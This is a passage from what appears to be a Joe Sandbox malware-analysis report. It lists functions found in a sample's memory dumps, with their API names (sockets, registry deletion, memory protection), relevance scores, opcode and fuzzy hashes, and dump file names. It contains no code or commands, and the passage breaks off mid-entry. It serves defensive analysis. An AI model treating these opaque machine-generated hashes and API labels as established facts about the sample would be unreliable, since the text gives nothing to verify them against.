                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventThread$CloseCurrentErrorLastSwitchclosesocketsendshutdown
                          • String ID:
                          • API String ID: 779811758-0
                          • Opcode ID: 00e3de7fc8725f4b2d8cdc05c81e10fbf63856aeac18edff56d4f986a8fa95c7
                          • Instruction ID: 9f41e05a1065f9e26491d2c3674555a48fd11a2a0e933ff84795919d568a9538
                          • Opcode Fuzzy Hash: 00e3de7fc8725f4b2d8cdc05c81e10fbf63856aeac18edff56d4f986a8fa95c7
                          • Instruction Fuzzy Hash: 3A21533124068286FB20AF25E4D0B983373FB88FA8F5442399A29476D9EF34CD86C740
                          Function 000001CFB9616868 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                          • String ID:
                          • API String ID: 3106088686-0
                          • Opcode ID: 465c1297e5f936002f31835874a9c435263bc14cb6033124fff1d9044e32e118
                          • Instruction ID: cda21cb18543c39129c8dadc360c1e521fba290ab0d70d819301da1ca7c43737
                          • Opcode Fuzzy Hash: 465c1297e5f936002f31835874a9c435263bc14cb6033124fff1d9044e32e118
                          • Instruction Fuzzy Hash: 8D0184346417E782FB44AB65D454B9832B3BB68B64F18923DD926023C5EF3CCE478320
                          Function 000001CFB95CBFB5 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 284COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getptd_invalid_parameter_noinfo
                          • String ID: $$$
                          • API String ID: 2372577547-233714265
                          • Opcode ID: 6b5051b5bc1d557b7424b4656fcd09d6d4fddccb4a49d3db86b5a37965dede4a
                          • Instruction ID: 5455111757687c610ff26506e72ba3cae4074c38b9ac6910bc21d5e1543eff22
                          • Opcode Fuzzy Hash: 6b5051b5bc1d557b7424b4656fcd09d6d4fddccb4a49d3db86b5a37965dede4a
                          • Instruction Fuzzy Hash: 0B8133338D8AD84AF77D5A19C985BF936F2E746710F24067DD8D3969C2DB24CE438241
                          Function 000001CFB95B1411 Relevance: 9.0, APIs: 7, Instructions: 259COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: 2dee8eee062c467992d154c250ee21dc4d631f61e710adb1d4d32dddbb98b58a
                          • Instruction ID: 77ec2b2872209d6b5aea5c3006318ef1a2ae3bd0db96b19b050d1da556857f8a
                          • Opcode Fuzzy Hash: 2dee8eee062c467992d154c250ee21dc4d631f61e710adb1d4d32dddbb98b58a
                          • Instruction Fuzzy Hash: 7D917871189A898FE795EF68C184BA9B7F1FF19304F1484ADD04EDB162CB31E982CB51
                          Function 000001CFB9391970 Relevance: 9.0, APIs: 7, Instructions: 259COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: 19403980c4b82a5381c6d13ab520cf831e32148cf56f6c96db5af4a91658fc77
                          • Instruction ID: 78be59cc4f1fc67115980f0a2640e5d95f3b1ab34242f539f5bff36ec4ca7b84
                          • Opcode Fuzzy Hash: 19403980c4b82a5381c6d13ab520cf831e32148cf56f6c96db5af4a91658fc77
                          • Instruction Fuzzy Hash: 6E913B70105A898FE795EFA8C095BA9B7F6FF19304F2844ADD04ADB152C771ED42CB41
                          Function 000001CFB93A3A50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 224COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3569367362-2084237596
                          • Opcode ID: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
                          • Instruction ID: 463925bc9867eb98e80f9a31a9887a460371d191e0acd4e4c41ce2ac0414e4b0
                          • Opcode Fuzzy Hash: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
                          • Instruction Fuzzy Hash: E071AF30158B898BF760EB58C405BE9B3E6FF81304F6C466ED445C3556DBB8EA52C782
                          Function 000001CFB9601940 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 36009230a0f1777ccfbb89fc56372207fae1e11fc8fa657492cdc956de2ed38c
                          • Instruction ID: 802b6f97ed6a07c75d5c518f53d1258ae1d2cd26759f514887e9432a1eb7eec6
                          • Opcode Fuzzy Hash: 36009230a0f1777ccfbb89fc56372207fae1e11fc8fa657492cdc956de2ed38c
                          • Instruction Fuzzy Hash: 31711176246AC186EB119F69E5C0BDD77B2F758B80F59902ADB8A07311CF38D9A2C310
                          Function 000001CFB95CDBF5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-3916222277
                          • Opcode ID: 678a5d9060657e1d823d637cf28b2f0c58d29ed2dcd500e0a7d9d9ccc373c5e5
                          • Instruction ID: 62ea53aeecd75fe2245c12391e4708ca6f5bc6f04892cb241a41cd216b198e61
                          • Opcode Fuzzy Hash: 678a5d9060657e1d823d637cf28b2f0c58d29ed2dcd500e0a7d9d9ccc373c5e5
                          • Instruction Fuzzy Hash: 3351FFB2180A484BF768AF28C6C2BE936F2EB45310F14026DD856CB6D6D774CE838691
                          Function 000001CFB9623DE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CallTranslator_amsg_exit
                          • String ID: MOC$RCC
                          • API String ID: 1374396951-2084237596
                          • Opcode ID: 1d462c2f10ce24a519212633c1e6cfe29c97502a7330fb4d454685fe849e362c
                          • Instruction ID: 44021ff09ac15f94dada44ab5e3c557fba632f86f0a61bbe44b71818f642042c
                          • Opcode Fuzzy Hash: 1d462c2f10ce24a519212633c1e6cfe29c97502a7330fb4d454685fe849e362c
                          • Instruction Fuzzy Hash: E361B272644AC286EB24EF15E480FEDB373F780B89F44452ADB8E47695DB78CA56C700
                          Function 000001CFB9623959 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$ExceptionRaise_amsg_exit
                          • String ID: csm
                          • API String ID: 4155239085-1018135373
                          • Opcode ID: d886a1c3553cd68f9cf7a97644700504b665781d40d3803e2721c710f225a129
                          • Instruction ID: 03bc1f0b1e96633e93a51f4f170caae3c0a2b3b2fce385e270f3a765d10db198
                          • Opcode Fuzzy Hash: d886a1c3553cd68f9cf7a97644700504b665781d40d3803e2721c710f225a129
                          • Instruction Fuzzy Hash: EA31303654468187F670AF12E040B9DB3B2F795B65F00423ADE9A07B95DB3ADE46CB00
                          Function 000001CFB960D831 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteOpenValue
                          • String ID: Console$IpDatespecial
                          • API String ID: 849931509-1840232981
                          • Opcode ID: e6bf59a39c93ccd8a2fce3cb6291b36bd99a0536316f225a4c4a7a176ea83b98
                          • Instruction ID: 28bd21512056e2f2ef440519b2ea24a495d562a7020ce8edf4963c9739078b47
                          • Opcode Fuzzy Hash: e6bf59a39c93ccd8a2fce3cb6291b36bd99a0536316f225a4c4a7a176ea83b98
                          • Instruction Fuzzy Hash: 79F01D3274098286FB20AB55F940BC97332F3407A9F000226CD5D43698DF78CA8AC704
                          Function 000001CFB9614E4C Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: dea3ac2ba7795ca4fc04a54829bc07f5f28fc5d4702961cbb12294847e09e509
                          • Instruction ID: 63e55f65673a87b9bedb62687523c3130a6e12c8341052ab7d26c550b3ce2c39
                          • Opcode Fuzzy Hash: dea3ac2ba7795ca4fc04a54829bc07f5f28fc5d4702961cbb12294847e09e509
                          • Instruction Fuzzy Hash: D041D0726407A28AFB689F39C451BAC36B3E784B94F54223DDA65473D5DB38CE42C780
                          Function 000001CFB96104D0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast
                          • String ID: Main
                          • API String ID: 1452528299-521822810
                          • Opcode ID: f6bbeae5cd547684b12614fe3c7d5d17ce7c357ab5793ef19da540d674d16875
                          • Instruction ID: 772a691aa495c262bd8a5bdb261a7022c88852dd9e0575bc7370c2dd789d5022
                          • Opcode Fuzzy Hash: f6bbeae5cd547684b12614fe3c7d5d17ce7c357ab5793ef19da540d674d16875
                          • Instruction Fuzzy Hash: 0341AF32B40AA2CAFB54CF11D141BA933B3F758B88F445039DA8947785DB38DE42CB80
                          Function 000001CFB960FEA0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead$mallocrealloc
                          • String ID:
                          • API String ID: 3638135368-0
                          • Opcode ID: 57d93e2d794d31c73ddf79fd2eef244c1df7bfe1804209be54d35a557055a819
                          • Instruction ID: 916cd8ed5a6302837fcbd69b9ad3677ff8abe9fb052424e1ce1e4bd7246b8f05
                          • Opcode Fuzzy Hash: 57d93e2d794d31c73ddf79fd2eef244c1df7bfe1804209be54d35a557055a819
                          • Instruction Fuzzy Hash: 30418032240BC587FB208F16E450BAAB7B2FB49B95F184029DF4A07764DF38D946C700
                          Function 000001CFB961D048 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$StringTypefreemalloc
                          • String ID:
                          • API String ID: 307345228-0
                          • Opcode ID: 897931331240f9ce2a7c565d2b2c43d51d0b86d34883ef3d5b0f097aaad4e249
                          • Instruction ID: 12a612b6b7ef1c980cbc7313581f4b5ce8eccf866939bc5fa1e7655bc8496adb
                          • Opcode Fuzzy Hash: 897931331240f9ce2a7c565d2b2c43d51d0b86d34883ef3d5b0f097aaad4e249
                          • Instruction Fuzzy Hash: 51419F3264069186FB149F25D811BD963B7FB44BE8F58523AEE2D477D5DB38CE028310
                          Function 000001CFB960B830 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$AllocCreateHeapObjectSection_callnewhmalloc
                          • String ID:
                          • API String ID: 2034203143-0
                          • Opcode ID: b5ee60dcc23de6932e17d70413b68075728645683aec6840a5fc2d6d18115cc8
                          • Instruction ID: f0fb6dcb46dfb04c6d1bb2c6dcdce410c1068fa4da8fc0974a113596734517c8
                          • Opcode Fuzzy Hash: b5ee60dcc23de6932e17d70413b68075728645683aec6840a5fc2d6d18115cc8
                          • Instruction Fuzzy Hash: 9C3171322446C182FF659F32D481BEEA6B7FB58B84F488439DF4957765EB78CA028700
                          Function 000001CFB9604920 Relevance: 7.6, APIs: 5, Instructions: 91networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$recv
                          • String ID:
                          • API String ID: 316788870-0
                          • Opcode ID: 3da117cddbf6bbce9cbf033f5496cc6c6a7c3f4bfe53dba83cf0896eb070ff71
                          • Instruction ID: f4fe97c87a4135f261d41f4eb4559e458362db085ca6d7cb823877a9ef9b9d50
                          • Opcode Fuzzy Hash: 3da117cddbf6bbce9cbf033f5496cc6c6a7c3f4bfe53dba83cf0896eb070ff71
                          • Instruction Fuzzy Hash: 57418D32244A8285FB609F29E4C4B9D27B3F745B98F54453ADB1983698EB39CE86C701
                          Function 000001CFB96247F0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
                          • String ID:
                          • API String ID: 3456427917-0
                          • Opcode ID: 2d7edc7519fb73cf76ba16e443ff7478fbca3bdb4f6fdcc44a9c8c0f234c6810
                          • Instruction ID: 3fbe7ea36de7fb904d596ed16816b22c6ed0ef08d4732856b1ff9fccaa97aa29
                          • Opcode Fuzzy Hash: 2d7edc7519fb73cf76ba16e443ff7478fbca3bdb4f6fdcc44a9c8c0f234c6810
                          • Instruction Fuzzy Hash: 6A318236654BC58AF750DF25E401BEEB772F789798F001229FA491AA58DB38C942CB00
                          Function 000001CFB9612FD0 Relevance: 7.6, APIs: 5, Instructions: 80memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocGuaranteeInfoProtectQueryStackSystemThread
                          • String ID:
                          • API String ID: 513674450-0
                          • Opcode ID: 92c15f89d57241f6b16f901cecf13a501dead97400cb3aaf053e3c9941c96e37
                          • Instruction ID: 5fe3e8f4869abdfb77fb956ca72aff68badc4ceead4022e2f94926f9ee9f8e66
                          • Opcode Fuzzy Hash: 92c15f89d57241f6b16f901cecf13a501dead97400cb3aaf053e3c9941c96e37
                          • Instruction Fuzzy Hash: F8315232350AD28AEB14DF31E844BDD33F6F748788F48502A9A0A47758DF38DA46C700
                          Function 000001CFB95CE235 Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$__doserrno
                          • String ID:
                          • API String ID: 2614100947-0
                          • Opcode ID: f6747c994bee0120bca5ea429985f7c2a1c01f1207c446315ef510763f0ad3e3
                          • Instruction ID: bacca1a9d00ad28fea435d1d7c81886f43e0ee8e6161dc507f0bb5f70257c03a
                          • Opcode Fuzzy Hash: f6747c994bee0120bca5ea429985f7c2a1c01f1207c446315ef510763f0ad3e3
                          • Instruction Fuzzy Hash: 0121F8326C86908EF2146BA8D6D1BED3AF2EB45310F04053DF416875D3D764CE968256
                          Function 000001CFB93A13CC Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$__doserrno
                          • String ID:
                          • API String ID: 2614100947-0
                          • Opcode ID: b78143fa32f064d218713fe95a5adf2227d442b671ea0c90b86e696d9d98e483
                          • Instruction ID: 1e22a32c3298f4ae2743c32f05003a95cf49ca885738398b90b59e2cb5f517af
                          • Opcode Fuzzy Hash: b78143fa32f064d218713fe95a5adf2227d442b671ea0c90b86e696d9d98e483
                          • Instruction Fuzzy Hash: 0D21C4306846844EF714AFA8D895BEE77BAEF87310F2D417CE416871E3D764CE428651
                          Function 000001CFB9612410 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                          • String ID:
                          • API String ID: 1909145217-0
                          • Opcode ID: 27add749fbee0590bf2bec2a260e94ba60e8cbf195f3a8d4dc1e4e486805c601
                          • Instruction ID: cce5117066acee2ef31f0e1d8cd73ba570337f7c51bf514ae70b224ee8edc38d
                          • Opcode Fuzzy Hash: 27add749fbee0590bf2bec2a260e94ba60e8cbf195f3a8d4dc1e4e486805c601
                          • Instruction Fuzzy Hash: 8321A1313866E281FB04AB25E948BDAA3B3B789BC0F44543DDD0E47359EB78CA42C304
                          Function 000001CFB960C0B0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSelect$ColorCompatibleCreateDeleteTable
                          • String ID:
                          • API String ID: 3899591553-0
                          • Opcode ID: 3de61e68eef413ff6c6bd4ba23286e24295c83a60f82d45f4363372d56b9f668
                          • Instruction ID: 234ed4b2812096201180ee0efcdea53816d839668806f7b883d570619758a029
                          • Opcode Fuzzy Hash: 3de61e68eef413ff6c6bd4ba23286e24295c83a60f82d45f4363372d56b9f668
                          • Instruction Fuzzy Hash: 0C218E31240A91C9FB549F26E590B993376FB98FD8F10903ADE4A53718DF39C982C380
                          Function 000001CFB9605DE0 Relevance: 7.5, APIs: 6, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 2a445fa39c5b0253e4bd2923b597622878c10cad0481ddc28a34dad83e9c0730
                          • Instruction ID: 0e6b81df3325846ce560153659404878c81fa24aeefad4a1cee930bbcab9f2d1
                          • Opcode Fuzzy Hash: 2a445fa39c5b0253e4bd2923b597622878c10cad0481ddc28a34dad83e9c0730
                          • Instruction Fuzzy Hash: C4110732660A9187EB90AB22F4947D97372F764751F845026DBCB43A60DF38E98AC700
                          Function 000001CFB95CD6A1 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 744e5961bd2884f54a06c4d55f49b2095068003750696114cf22942ce0b93080
                          • Instruction ID: 14b68f2f64b3e04795a1779e0658dc60538865794b29266087d3a762b838b353
                          • Opcode Fuzzy Hash: 744e5961bd2884f54a06c4d55f49b2095068003750696114cf22942ce0b93080
                          • Instruction Fuzzy Hash: 8201FE721D48C48DF2586754C591BD432F2FB10315F40827DF00AC69D2C779DD42C621
                          Function 000001CFB93A00DC Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
                          • Instruction ID: 0b08e91d73e21c489f66813f113a3817570ede00f41acdbeb7cdbb5b9adf31da
                          • Opcode Fuzzy Hash: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
                          • Instruction Fuzzy Hash: AF01D6341A05884EF708AB64C895BD833BAFF2B325F7D427CE006871E3D7798D428651
                          Function 000001CFB961AE60 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
